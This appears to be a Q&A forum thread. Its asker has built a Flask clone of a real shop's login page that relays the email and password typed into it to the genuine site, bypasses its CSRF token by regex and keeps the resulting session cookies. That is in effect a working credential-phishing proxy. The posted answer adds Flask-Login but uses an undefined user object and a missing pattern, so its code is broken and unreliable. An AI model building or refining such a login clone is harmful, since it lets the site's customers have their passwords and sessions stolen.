Flask web app redirects to login page instead of dashboard after successful authentication to an external website
I am making a Flask web application that clones a login page of a website and sending post request to authenticate to the original website. The request is made using session so to be able to preserve the cookies and after login to redirect to the dashboard of the main website. The problem is that after successful authentication over my login page it redirect to the login page of the original website instead of the dashboard. I know the login is successful because i wrote the content page of response after login and the page is the dashboard.
Template of the website can be found at this URL https://alfaparfshop.vercel.app/inregistrare. I modified the form to make request to my Flask app:
<form class="form-box" action="/inregistrare" method="post">
    {% if errorMsg %}
    <div class="errorMsg">
        Adresa de e-mail / parola introduse sunt incorecte. Te rugam sa incerci din nou.
    </div>
    {% endif %}
    <div class="col">
        <label for="" class="label-s ">
            Email
        </label>
        <input type="email" class="input-s {% if errorMsg %}err-input{% endif %}" name="email" value="" id="_loginEmail"
            autocomplete="username">
    </div>
    <div class="col">
        <label for="" class="label-s ">
            Parola
        </label>
        <input type="password" class="input-s {% if errorMsg %}err-input{% endif %}" value="" name="password"
            id="_loginPassword" autocomplete="current-password">
    </div>
    <a href="#" id="doLogin" class="btn std full -g-no-url">Intra in cont</a>
    <a href="#" class="client-pass-recov -g-no-url"
        onclick="$.Gomag.openDefaultPopup('.client-pass-recov', {iframe : {css : {width : '360px'}}, src: 'https://www.alfaparfshop.ro/recuperare-parola?email='});">Ai
        uitat parola?</a>
</form>

The Flask application code consists of a main route that checks for the cookies in the session and if they exist will create a session object, update the cookies and try to get dashboard URL and if response URL is correct than redirect to that website. I also handle errors but couldn't catch any, it simply redirect to login page instead dashboard.
On my custom login route I am sending request to login the original website, search for CSRF token using regex because key name is different any time. To make the request I also use necessary headers I found in the POST request of the original website in Networks tab from Developer Tools.
from flask import Flask, render_template, redirect, request, session as flask_session
from requests import Session, RequestException
import re

login_url = 'https://www.alfaparfshop.ro/inregistrare?pcId=&preview=&a=&ret=&redirect='
desired_url_after_login = 'https://www.alfaparfshop.ro/contul-meu'
headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate, br, zstd",
    "Accept-Language": "en-US,en;q=0.9,fr-FR;q=0.8,fr;q=0.7,ro-RO;q=0.6,ro;q=0.5",
    "Cache-Control": "max-age=0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://www.alfaparfshop.ro",
    "Referer": "https://www.alfaparfshop.ro/inregistrare?pcId=&preview=&a=&ret=&redirect=",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
}
pattern = r'"name":"([0-9a-z]+)","value":"([0-9a-z]+)"'

app = Flask(__name__)
app.secret_key = 'secret-key'

@app.route('/')
def index():
    if 'cookies' in flask_session:
        cookies = flask_session['cookies']
        session = Session()
        session.cookies.update(cookies)
        try:
            response = session.get(desired_url_after_login, allow_redirects=True, headers=headers)
            if response.url == desired_url_after_login:
                return redirect(desired_url_after_login)
        except RequestException as e:
            print(e)
    return redirect('/inregistrare')


@app.route("/inregistrare", methods=["POST", "GET"])
def inregistrare():
    errorMsg = False
    if request.method == "POST":
        email = request.form['email']
        password = request.form['password']
        session = Session()
        response = session.get(login_url, headers=headers)
        matches = re.findall(pattern, response.content.decode('utf-8'))
        if matches:
            hidden_input_name, hidden_input_value = matches[0]
            login_data = {
                "email": email,
                "password": password,
                hidden_input_name: hidden_input_value
            }
            response = session.post(login_url, data=login_data, headers=headers)
            if response.url == desired_url_after_login:
                print("OK")
                with open("content.html", "wb") as f:
                    f.write(response.content)
                flask_session['cookies'] = session.cookies.get_dict()
                return redirect(desired_url_after_login)
            print("BAD")
        errorMsg = True
    return render_template('inregistrare.html', errorMsg=errorMsg)

The original website is https://alfaparfshop.ro/ and my custom html code for login page can be found at https://github.com/mihai-ciorobitca/Alfa/blob/main/login.html.
This post In my flask app for web Not redirecting to dashboard after login is out of my question as I try to login an external website.
I also tried to debug login function and everything works fine but it doesn't redirect to the correct webpage which should look like this 

Use of Flask-Login for user authentication and session management.
Implementation of the @login_required decorator to protect the dashboard route, ensuring that the user is logged in before accessing the dashboard.
Usage of login_user(user) to log in the user after successful authentication to the external website.
Addition of the /dashboard route to handle the rendering of the dashboard page for authenticated users.
from flask import Flask, render_template, redirect, request, session as flask_session
from requests import Session, RequestException
import re
from flask_login import login_user, login_required

login_url = 'https://www.alfaparfshop.ro/inregistrare?pcId=&preview=&a=&ret=&redirect='
desired_url_after_login = 'https://www.alfaparfshop.ro/contul-meu'
headers = {
    # Your headers here
}

app = Flask(__name__)
app.secret_key = 'secret-key'

@app.route('/')
def index():
    if 'cookies' in flask_session:
        cookies = flask_session['cookies']
        session = Session()
        session.cookies.update(cookies)
        try:
            response = session.get(desired_url_after_login, allow_redirects=True, headers=headers)
            if response.url == desired_url_after_login:
                return redirect(desired_url_after_login)
        except RequestException as e:
            print(e)
    return redirect('/inregistrare')

@app.route("/inregistrare", methods=["POST", "GET"])
def inregistrare():
    errorMsg = False
    if request.method == "POST":
        email = request.form['email']
        password = request.form['password']
        session = Session()
        response = session.get(login_url, headers=headers)
        matches = re.findall(pattern, response.content.decode('utf-8'))
        if matches:
            hidden_input_name, hidden_input_value = matches[0]
            login_data = {
                "email": email,
                "password": password,
                hidden_input_name: hidden_input_value
            }
            response = session.post(login_url, data=login_data, headers=headers)
            if response.url == desired_url_after_login:
                print("OK")
                with open("content.html", "wb") as f:
                    f.write(response.content)
                flask_session['cookies'] = session.cookies.get_dict()
                # Use Flask-Login's login_user function to log in the user
                # Replace 'user' with the actual user object
                login_user(user)
                return redirect(desired_url_after_login)
            print("BAD")
        errorMsg = True
    return render_template('inregistrare.html', errorMsg=errorMsg)

@app.route('/dashboard')
@login_required
def dashboard():
    # Code to render the dashboard page
    return render_template('dashboard.html')

if __name__ == '__main__':
    app.run()


I am using Flask to clone the login page, so after I authenticate should redirect to the original website dashboard, I don't have one, and this is located at https://www.alfaparfshop.ro/contul-meu. But somehow even if I am logged in it redirects me to https://www.alfaparfshop.ro/inregistrare, the login page of original website.

As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers in the help center.
